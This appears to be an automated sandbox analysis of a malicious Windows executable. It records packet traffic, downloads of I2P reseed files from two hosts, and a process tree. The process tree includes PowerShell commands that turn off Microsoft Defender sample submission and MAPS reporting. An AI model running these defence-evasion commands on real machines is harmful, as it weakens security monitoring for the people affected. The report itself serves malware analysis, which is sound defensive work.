                                                                                                                Oct 11, 2024 16:53:49.422760010 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.422791958 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.422825098 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.422857046 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.422858000 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:49.422878027 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:49.422893047 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.422929049 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.422976971 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.422982931 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:49.423008919 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.423041105 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.423069954 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:49.423070908 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.423120022 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.423146009 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:49.423151016 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.423165083 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:49.423228025 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.423278093 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.423280954 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:49.423311949 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.423345089 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.423379898 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:49.423379898 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.423427105 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.423459053 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.423506021 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:49.423506021 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:49.423507929 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.423541069 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:49.423573971 CEST112549730146.70.24.213192.168.2.4
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Oct 11, 2024 16:54:03.003743887 CEST192.168.2.41.1.1.10xf383Standard query (0)banana.incognet.ioA (IP address)IN (0x0001)false
                                                                                                                Oct 11, 2024 16:54:53.298024893 CEST192.168.2.41.1.1.10xd5beStandard query (0)reseed.diva.exchangeA (IP address)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Oct 11, 2024 16:54:03.016427040 CEST1.1.1.1192.168.2.40xf383No error (0)banana.incognet.io23.137.250.108A (IP address)IN (0x0001)false
                                                                                                                Oct 11, 2024 16:54:53.455132008 CEST1.1.1.1192.168.2.40xd5beNo error (0)reseed.diva.exchange80.74.145.70A (IP address)IN (0x0001)false
                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.44975523.137.250.1084432656C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-11 14:54:03 UTC104OUTGET https://banana.incognet.io:443/i2pseeds.su3 HTTP/1.0
                                                                                                                User-Agent: Wget/1.11.4
                                                                                                                Connection: close
                                                                                                                2024-10-11 14:54:03 UTC330INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 11 Oct 2024 14:54:03 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 88785
                                                                                                                Connection: close
                                                                                                                Content-Disposition: attachment; filename=i2pseeds.su3
                                                                                                                Server: banana.incognet.io
                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Vary: Origin
                                                                                                                Allow: GET
                                                                                                                2024-10-11 14:54:03 UTC16054INData Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 10 00 00 00 00 00 01 58 89 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 32 38 36 35 31 35 34 31 00 00 00 00 00 00 72 61 6d 62 6c 65 72 40 6d 61 69 6c 2e 69 32 70 50 4b 03 04 14 00 08 00 08 00 12 66 4b 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 38 62 52 6b 33 79 69 31 56 43 61 59 43 54 59 74 34 51 37 48 35 5a 68 4b 4e 6b 55 66 7a 55 38 76 6b 31 5a 5a 77 2d 54 51 49 36 73 3d 2e 64 61 74 55 54 05 00 01 a5 1e 09 67 ec 93 5b 88 1b 55 18 c7 27 dd c4 6d 83 ae 17 84 ea d3 0a 5a f5 21 bb cc 39 67 26 73 26 e3 81 66 92 6c 2e dd c9 3d 99 cd 60 1f 26 93 49 26 c9 4e 26 99 99 5c a5 01 7d 90 fa a0 b4 05 a1 52 a5 0b 5a 58 f0 c1 8a d4 a2 28 82 6f 82 28 d8 16 44 44 c4 cb 8b 5a 15
                                                                                                                Data Ascii: I2Psu3X1728651541rambler@mail.i2pPKfKY;routerInfo-8bRk3yi1VCaYCTYt4Q7H5ZhKNkUfzU8vk1ZZw-TQI6s=.datUTg[U'mZ!9g&s&fl.=`&I&N&\}RZX(o(DDZ
                                                                                                                2024-10-11 14:54:03 UTC16384INData Raw: a5 8b 97 99 5b 56 4e 98 85 69 41 b8 7f 94 7b 9e 91 59 40 80 69 49 b2 7b 95 4b 4e 78 60 a1 4f 76 46 69 46 86 b9 73 b1 67 8a 23 c8 47 25 89 e9 06 b6 5c 46 16 c6 96 46 06 e6 e6 c6 46 10 21 90 8f 8c 8c cc 0d cc cc 4d 2d 0d 20 42 20 1f 59 98 5a 1a 18 18 98 9a 5a 82 e3 c2 cc d3 c2 38 32 24 2b d9 d9 af c4 b5 3c 28 d2 24 bd 32 20 3b d0 34 c0 2c cc a2 d0 24 33 b8 cc 33 c5 22 c8 db 25 3c a3 ac 38 d7 02 16 17 0c 0c 3a 90 e0 67 f2 09 b5 66 cd 4b 2d f1 4c 01 09 f3 15 e5 97 96 a4 16 e9 95 a5 16 15 67 e6 e7 d9 b2 19 e8 59 ea 99 99 58 4f 3b c7 f3 63 7b 91 7e 80 14 fb 3a b5 39 95 ae a7 59 e2 45 93 7f 06 8a 26 fd 7b b3 d2 a2 fb 83 e0 8b 43 82 4e 0c 6b d9 5b cf b9 bb b6 6e 3e bb b9 7e ae 78 f5 b4 b6 fd 3d 27 ea 0e fd 5a 63 99 98 13 cb 03 08 00 00 ff ff 50 4b 07 08 3f cc 7c
                                                                                                                Data Ascii: [VNiA{Y@iI{KNx`OvFiFsg#G%\FFF!M- B YZZ82$+<($2 ;4,$33"%<8:gfK-LgYXO;c{~:9YE&{CNk[n>~x='ZcPK?|
                                                                                                                2024-10-11 14:54:04 UTC16384INData Raw: f1 c3 f5 b6 2b df bb b6 af aa 63 48 b1 5d bf 71 a1 44 4c 7a a3 84 bd a2 8f 9b 49 91 7e 56 e1 59 fb 93 89 1f 9e 48 9d 59 fc 65 7b ac f8 e7 63 9f 57 e5 fe ae 69 bd 1b 68 30 2a 8f 5f 3e b3 ab eb dc af 25 f1 6f 85 5a d4 d7 3a 0b c9 dd 97 61 3f 22 df bb e4 c6 96 16 8d ed 8b 9b 1f 0a bc 63 65 60 61 60 67 60 61 60 60 9c 54 3d cb a8 8d 85 8f 01 0a 58 fd 42 9c 03 8c 18 1c 58 92 13 0b 8a 6d 19 4d ac 19 8b 6d 75 c2 82 d3 cd 0d 43 4a cc dc cb 3d cd d3 0a 7d 82 53 fd ca 03 b3 7c ab 5c dc 9c 4d b2 cb eb 42 c3 2a 72 5d 0c 73 dd a2 4a cc 32 f2 6d ad 19 cb 6c 19 8d ac 99 71 18 68 46 ae 81 fc 30 03 59 82 83 43 8d 18 ab 11 0e cc b4 d5 49 2f ce 2c ab f3 ae 8b cc 37 8e f4 ad 2b 32 ca 0c 31 32 0d cc 4e ad 73 4f c9 cc 8f cc 31 89 48 2e f0 f0 f7 89 08 71 ae 0c 37 4e b6 b5 66 cd
                                                                                                                Data Ascii: +cH]qDLzI~VYHYe{cWih0*_>%oZ:a?"ce`a`g`a``T=XBXmMmuCJ=}S|\MB*r]sJ2mlqhF0YCI/,7+212NsO1H.q7Nf
                                                                                                                2024-10-11 14:54:04 UTC16384INData Raw: 8e 48 0b b2 66 cd 4b 2d f1 4c 01 89 8b e4 a5 96 a4 24 e9 65 e7 e5 97 e7 f9 a4 26 16 a7 06 a7 96 14 db 32 1b 1b 98 59 0b 21 49 05 e5 97 96 a4 16 15 db b2 1a 1a 98 9b 9a 58 f3 15 81 f9 7a 65 a9 45 c5 99 f9 79 b6 6c 06 7a 96 7a 66 86 d6 29 77 75 94 75 17 1d 15 f1 bd 1e c5 73 fd 86 e3 64 fd 19 01 53 b6 06 ca af 3a d2 c1 b7 45 d7 f3 f3 0a a1 e3 62 66 6b 67 2f 3f 9f 19 d7 7c 32 c3 25 35 45 47 ff 45 9d c1 a4 fb 6e 0a 2d 3d 2f f7 47 d4 32 02 02 00 00 ff ff 50 4b 07 08 da 10 af 2b 1d 02 00 00 31 04 00 00 50 4b 03 04 14 00 08 08 08 00 45 63 4b 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 73 78 72 72 4c 6a 50 6b 54 6e 38 33 4a 76 38 35 48 78 6f 52 54 6e 54 31 44 70 36 7a 4a 74 53 47 7e 33 6e 66 38 6a 63 38 42 47 63 3d 2e 64 61
                                                                                                                Data Ascii: HfK-L$e&2Y!IXzeEylzzf)wuusdS:Ebfkg/?|2%5EGEn-=/G2PK+1PKEcKY;routerInfo-sxrrLjPkTn83Jv85HxoRTnT1Dp6zJtSG~3nf8jc8BGc=.da
                                                                                                                2024-10-11 14:54:04 UTC16384INData Raw: 5f 68 8a 86 48 d8 e3 da 5b b9 1b 53 58 d9 12 79 4f 2e f9 cd ca c0 c2 c0 ce c0 c2 c0 c0 38 a9 7a be bc 09 0b 33 03 14 b0 fa 85 38 07 18 31 94 b0 64 e4 17 97 d8 72 9b 98 ea 19 19 99 ea 99 9b ea 99 58 33 66 da 4a 18 18 45 ba 97 97 06 fb 14 e8 7a 85 79 79 f9 3b 95 e5 39 55 55 96 db da 5a b3 14 e4 17 95 d8 b2 1a 19 1b 98 1a 5a 33 16 db ea 44 99 1a 24 bb 94 1a 95 16 79 97 97 19 1a a5 19 98 a6 65 18 26 1b 66 5a 64 99 fb fb a5 24 fb a5 04 97 5b f8 f9 a6 86 14 9b 18 a6 db 5a 33 96 d9 32 1a 59 a3 3b a2 02 e2 08 7e 23 0b 03 63 2b 43 4b 23 03 2b 2b 23 2b 73 03 da 3b 84 03 e6 10 96 e0 e0 50 23 86 89 2c c9 89 05 c5 b6 8c ce d6 d8 43 45 27 38 c4 cc c8 d8 c8 d2 cb 31 3c a8 2a c4 30 c9 27 cd dd b8 c2 cb 3d 2d d2 23 b3 38 38 b5 30 24 c7 d4 b4 34 d4 ac 28 dc a5 a4 24 14 8b
                                                                                                                Data Ascii: _hH[SXyO.8z381drX3fJEzyy;9UUZZ3D$ye&fZd$[Z32Y;~#c+CK#++#+s;P#,CE'81<*0'=-#880$4($
                                                                                                                2024-10-11 14:54:04 UTC7195INData Raw: 2d 56 69 4b 4a 4d 36 61 37 50 50 75 4b 68 34 32 71 30 52 55 43 69 61 41 5a 6a 6a 72 6a 6c 64 5a 6e 47 6b 3d 2e 64 61 74 55 54 05 00 01 3f 1e 09 67 50 4b 01 02 14 00 14 00 08 08 08 00 52 65 4b 59 b8 55 e3 78 97 02 00 00 ae 04 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 01 7e 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 4e 7a 73 76 6f 34 52 63 77 55 74 47 4e 57 70 74 4a 53 51 48 43 4f 71 61 76 48 4e 65 68 75 63 74 73 67 70 7a 36 6a 49 4a 76 7e 67 3d 2e 64 61 74 55 54 05 00 01 3c 1d 09 67 50 4b 01 02 14 00 14 00 08 08 08 00 06 66 4b 59 eb 9a f9 4c e4 02 00 00 05 05 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 0a 81 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 34 74 49 42 47 69 69 7e 4f 51 47 48 52 6f 4d 30 54 77 52 45 4f 73 77 64 6d 57 46 34 67 66 6d 43 38 6e 41
                                                                                                                Data Ascii: -ViKJM6a7PPuKh42q0RUCiaAZjjrjldZnGk=.datUT?gPKReKYUx;~routerInfo-Nzsvo4RcwUtGNWptJSQHCOqavHNehuctsgpz6jIJv~g=.datUT<gPKfKYL;routerInfo-4tIBGii~OQGHRoM0TwREOswdmWF4gfmC8nA


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.45002623.137.250.1084432256C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-11 14:54:53 UTC104OUTGET https://banana.incognet.io:443/i2pseeds.su3 HTTP/1.0
                                                                                                                User-Agent: Wget/1.11.4
                                                                                                                Connection: close
                                                                                                                2024-10-11 14:54:53 UTC373INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 11 Oct 2024 14:54:53 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 13696
                                                                                                                Last-Modified: Thu, 18 Nov 2021 02:02:21 GMT
                                                                                                                Connection: close
                                                                                                                Vary: Accept-Encoding
                                                                                                                ETag: "6195b42d-3580"
                                                                                                                Server: banana.incognet.io
                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Vary: Origin
                                                                                                                Allow: GET
                                                                                                                Accept-Ranges: bytes
                                                                                                                2024-10-11 14:54:53 UTC13696INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 69 63 6f 6e 20 68 72 65 66 3d 66 61 76 69 63 6f 6e 2e 73 76 67 3e 3c 74 69 74 6c 65 3e 62 61 6e 61 6e 61 2e 69 6e 63 6f 67 6e 65 74 2e 69 6f 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 63 69 72 63 6c 65 20 61 74 20 63 65 6e 74 65 72 2c 23 65 36 64 62 62 30 2c 74 72 61 6e 73 70 61 72 65 6e 74 20 36 30 25 29 2c 72 65 70 65 61 74 69 6e 67 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 34 35 64 65 67 2c 23 65 36 64 62 62 30 20 32 2e 35 25 2c 23 65 36 64 32 38 32 20 35 25 29 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 2c 72 65 70 65 61 74 69 6e 67 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65
                                                                                                                Data Ascii: <!doctype html><link rel=icon href=favicon.svg><title>banana.incognet.io</title><style>html{background:radial-gradient(circle at center,#e6dbb0,transparent 60%),repeating-linear-gradient(45deg,#e6dbb0 2.5%,#e6d282 5%) center center,repeating-linear-gradie


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.45002780.74.145.704432256C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-11 14:54:54 UTC106OUTGET https://reseed.diva.exchange:443/i2pseeds.su3 HTTP/1.0
                                                                                                                User-Agent: Wget/1.11.4
                                                                                                                Connection: close
                                                                                                                2024-10-11 14:54:54 UTC406INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Fri, 11 Oct 2024 14:54:54 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 71860
                                                                                                                Connection: close
                                                                                                                Content-Disposition: attachment; filename=i2pseeds.su3
                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
                                                                                                                2024-10-11 14:54:54 UTC15978INData Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 14 00 00 00 00 00 01 16 68 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 32 38 36 34 31 35 39 33 00 00 00 00 00 00 72 65 73 65 65 64 40 64 69 76 61 2e 65 78 63 68 61 6e 67 65 50 4b 03 04 14 00 08 00 08 00 e7 50 4b 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 58 44 55 4e 30 7a 57 30 7a 66 64 61 41 2d 71 6b 61 47 78 66 35 64 68 47 6c 48 75 6f 79 33 76 48 74 31 77 58 78 57 51 53 38 6b 73 3d 2e 64 61 74 55 54 05 00 01 d3 f8 08 67 da a3 36 45 4b 65 22 4f 66 c8 bd 8c f4 3b 65 93 6b d9 ce 6c e3 9f d9 64 22 fc f2 9b e1 5f c9 29 9e 15 09 b3 ee ce aa 91 54 ae dd 2c 51 91 76 6c f9 9d ee 45 e7 76 cc 5c c6 5a 5e cb 16 38 fd 97 d6 56 e6 cc 51 79 fc f2 ce 4f 6e 44 d9 1c f2 ab 59
                                                                                                                Data Ascii: I2Psu3h1728641593reseed@diva.exchangePKPKY;routerInfo-XDUN0zW0zfdaA-qkaGxf5dhGlHuoy3vHt1wXxWQS8ks=.datUTg6EKe"Of;ekld"_)T,QvlEv\Z^8VQyOnDY
                                                                                                                2024-10-11 14:54:54 UTC16384INData Raw: 51 6d b9 ed 92 7f 6d cf af 5c 9d d4 fb e6 e7 2d 09 9f 09 29 d7 37 84 c5 75 94 aa f4 ef b7 d4 3a f2 40 ac 73 f1 19 0b af 5b df 0c 16 9e 65 dd b9 9c 85 b7 ad ad da d0 3c 45 f6 8d 4a 93 e7 93 c2 ac 4d 2b b6 f3 7f a8 59 74 77 8a f5 d9 9f fb 95 05 34 8a cf 45 b8 b4 85 69 fd a8 5a d9 2d a1 f4 a2 4f d3 68 9a fc 79 df fd 25 ac 0c 2c 0c ec 0c 2c 0c 0c 8c 93 aa 7e ae bc cb c2 ca 00 05 2c c1 c1 a1 46 0c 53 58 92 13 0b 8a 6d 19 9d ac 59 32 f2 8b 4b 6c f9 cc cc f5 0c cd 0d f5 8c 8c 2c f4 0c 8d 2d ac 19 33 6d 75 1c f3 5c 82 bd 2c bc 32 ca cb f2 22 0a 75 9d 9c f3 ab fc 2c eb aa bc 92 42 fd 4a 52 bd c2 74 1d 33 82 43 bc 52 52 0a 0c 9d 0c 92 6d ad 59 0a f2 8b 4a 6c 59 0d 8d 4c cd cd ad 19 8b 6d 75 bc b3 23 a3 22 23 8c 03 3c 43 a3 f2 0b 8b 8c bc 4d 0b 0b fc 7d cc 52 5c 4c
                                                                                                                Data Ascii: Qmm\-)7u:@s[e<EJM+Ytw4EiZ-Ohy%,,~,FSXmY2Kl,-3mu\,2"u,BJRt3CRRmYJlYLmu#"#<CM}R\L
                                                                                                                2024-10-11 14:54:54 UTC16384INData Raw: 66 96 1d 1d 02 00 00 35 04 00 00 50 4b 03 04 14 00 08 00 08 00 48 51 4b 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 6f 79 4f 76 51 77 5a 6d 41 73 71 46 4b 46 37 59 78 6e 77 42 69 6f 53 66 6c 47 44 67 38 50 6e 53 6e 46 79 79 61 75 72 6a 67 36 30 3d 2e 64 61 74 55 54 05 00 01 89 f9 08 67 b2 93 f8 b5 f8 aa 43 8c bd f7 b2 7d 6e b7 19 77 b1 71 14 cb 3e 59 53 a2 64 70 eb 5d b2 c8 d2 27 b3 32 8e ae e1 2b cc d5 9e ab db e1 7d d6 a8 d7 81 75 af 91 fd db bb b3 d7 4e 9e cf cf c7 b2 38 e5 b3 9d 5e ed 1c 31 a9 6b e7 ec 5a bf 38 2f df a4 c9 e9 32 bd e1 a7 d0 21 e1 c4 29 17 d7 e8 dc e9 0d dc b5 b2 d4 eb e4 87 29 5f 8e 19 dd b2 d0 be b8 34 fc 4e ba bc bf 57 c1 39 1d d9 9f c7 54 97 32 b9 57 6a df 9f 14 d5 f7 ea 72 72 f5 44 a3 bb 0f
                                                                                                                Data Ascii: f5PKHQKY;routerInfo-oyOvQwZmAsqFKF7YxnwBioSflGDg8PnSnFyyaurjg60=.datUTgC}nwq>YSdp]'2+}uN8^1kZ8/2!))_4NW9T2WjrrD
                                                                                                                2024-10-11 14:54:54 UTC16384INData Raw: f9 75 0c d3 8f ff 5e d0 ab a2 1a d5 79 96 95 81 85 81 9d 81 85 81 81 71 52 95 7c fb 2b 26 66 06 28 60 f5 0b 71 0e 30 62 28 67 c9 c8 2f 2e b1 e5 33 b7 d4 33 34 34 d1 33 b4 30 d3 33 b4 30 b6 66 cc b4 95 30 0d cd 70 f2 f6 ac aa d0 cd 37 2c cc c8 c8 32 a9 0a f4 ce f4 0b b4 b5 b5 66 29 c8 2f 2a b1 65 35 35 34 36 32 b1 66 2c b6 d5 49 cb f0 c9 4d f4 0a 31 c8 2a b1 c8 b2 28 77 2f 48 0e 32 73 2d f2 cd 4f 0f 8a 30 ca 2a a8 34 0b ae f4 f4 35 4c 0a 31 73 35 f1 f0 b5 b5 66 2c b3 65 34 b2 e6 80 b9 83 25 38 38 d4 88 61 0a 4b 72 62 41 b1 2d a3 b3 35 4e f7 e8 98 a6 fa 7b 1b 06 26 1a a7 64 84 b8 15 e4 45 19 a6 66 a5 15 1b a6 f8 5a 96 87 14 96 1a 94 58 06 9b fa 3a 57 7a 18 9b 07 a7 e7 59 60 71 a3 ab b3 6f 78 91 47 8a 77 78 84 5b 9d bb 47 96 79 52 61 52 64 56 5a 55 52 64 44
                                                                                                                Data Ascii: u^yqR|+&f(`q0b(g/.33443030f0p7,2f)/*e55462f,IM1*(w/H2s-O0*45L1s5f,e4%88aKrbA-5N{&dEfZX:WzY`qoxGwx[GyRaRdVZURdD
                                                                                                                2024-10-11 14:54:54 UTC6730INData Raw: 4d 36 78 38 55 4b 51 2d 64 4a 58 6a 7a 62 65 58 79 6d 36 64 48 69 51 41 45 4d 3d 2e 64 61 74 55 54 05 00 01 89 f9 08 67 50 4b 01 02 14 00 14 00 08 08 08 00 48 51 4b 59 24 07 54 78 1a 02 00 00 30 04 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 9d 4a 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 61 4b 35 4c 35 71 39 34 74 61 35 43 58 30 33 6a 50 79 7e 63 4e 70 56 75 71 73 31 57 4c 76 31 64 67 58 4e 79 35 73 44 43 64 4f 51 3d 2e 64 61 74 55 54 05 00 01 89 f9 08 67 50 4b 01 02 14 00 14 00 08 00 08 00 48 51 4b 59 df c1 34 b7 1b 02 00 00 30 04 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 29 4d 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 76 30 73 75 78 57 5a 4f 67 37 6b 48 65 4e 73 37 44 61 75 76 66 41 66 34 46 70 59 53 73 71 31 52 5a 6a 42 34 6a 2d 4a 62 33 45 6b 3d
                                                                                                                Data Ascii: M6x8UKQ-dJXjzbeXym6dHiQAEM=.datUTgPKHQKY$Tx0;JrouterInfo-aK5L5q94ta5CX03jPy~cNpVuqs1WLv1dgXNy5sDCdOQ=.datUTgPKHQKY40;)MrouterInfo-v0suxWZOg7kHeNs7DauvfAf4FpYSsq1RZjB4j-Jb3Ek=


                                                                                                                Click to jump to process

                                                                                                                Click to jump to process

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Click to jump to process

                                                                                                                Target ID:0
                                                                                                                Start time:10:53:04
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:5'654'528 bytes
                                                                                                                MD5 hash:31D649663149DABD99C51B71E60A4A91
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:1
                                                                                                                Start time:10:53:04
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                Imagebase:0x400000
                                                                                                                File size:5'654'528 bytes
                                                                                                                MD5 hash:31D649663149DABD99C51B71E60A4A91
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                Target ID:2
                                                                                                                Start time:10:53:08
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat"
                                                                                                                Imagebase:0x7ff7b72b0000
                                                                                                                File size:289'792 bytes
                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:3
                                                                                                                Start time:10:53:08
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:4
                                                                                                                Start time:10:53:08
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
                                                                                                                Imagebase:0x7ff788560000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:5
                                                                                                                Start time:10:53:08
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe"
                                                                                                                Imagebase:0x7ff64b930000
                                                                                                                File size:98'304 bytes
                                                                                                                MD5 hash:319865D78CC8DF6270E27521B8182BFF
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 3%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:7
                                                                                                                Start time:10:53:11
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:8
                                                                                                                Start time:10:53:13
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
